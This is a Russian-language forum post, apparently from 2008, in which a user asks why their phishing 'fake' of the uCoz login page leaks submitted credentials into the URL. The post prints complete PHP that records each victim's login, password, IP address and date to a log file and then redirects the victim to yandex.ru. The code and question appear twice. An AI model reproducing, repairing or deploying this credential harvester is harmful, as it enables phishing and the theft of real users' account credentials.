-=Dem0n=-
06.10.2008, 01:23
Хотел создать фейк юкоза но ничего не получилось получил в адресной строке такую фигню
http://localhost/cs.php?user=qwert&password=qwert&rem=1&go=%C2%F5%EE%E4
вот фейк
<?php
ob_start();
function reglog($filename, $user, $password)
{
$d = date("d.m.Y - H.i.s");
$addr = getenv('REMOTE_ADDR');
$str = 'Login '.$user."\n";
$str .= 'Password '.$password."\n";
$str .= 'IP '.$addr."\n";
$str .= 'Date '.$d."\n";
$f = fopen($filename, "a+");
fwrite($f, $str."\n");
fclose($f);
header('location: http://yandex.ru');
return true;
}
$filename = 'log.php';
if (isset($_POST['go'])) reglog($filename, $_POST['user'], $_POST['password']);
ob_end_flush();
?>
после слова вход закрыл форму </form> имя типа submit - go
вроде все правильно.
http://localhost/cs.php?user=qwert&password=qwert&rem=1&go=%C2%F5%EE%E4
вот фейк
<?php
ob_start();
function reglog($filename, $user, $password)
{
$d = date("d.m.Y - H.i.s");
$addr = getenv('REMOTE_ADDR');
$str = 'Login '.$user."\n";
$str .= 'Password '.$password."\n";
$str .= 'IP '.$addr."\n";
$str .= 'Date '.$d."\n";
$f = fopen($filename, "a+");
fwrite($f, $str."\n");
fclose($f);
header('location: http://yandex.ru');
return true;
}
$filename = 'log.php';
if (isset($_POST['go'])) reglog($filename, $_POST['user'], $_POST['password']);
ob_end_flush();
?>
после слова вход закрыл форму </form> имя типа submit - go
вроде все правильно.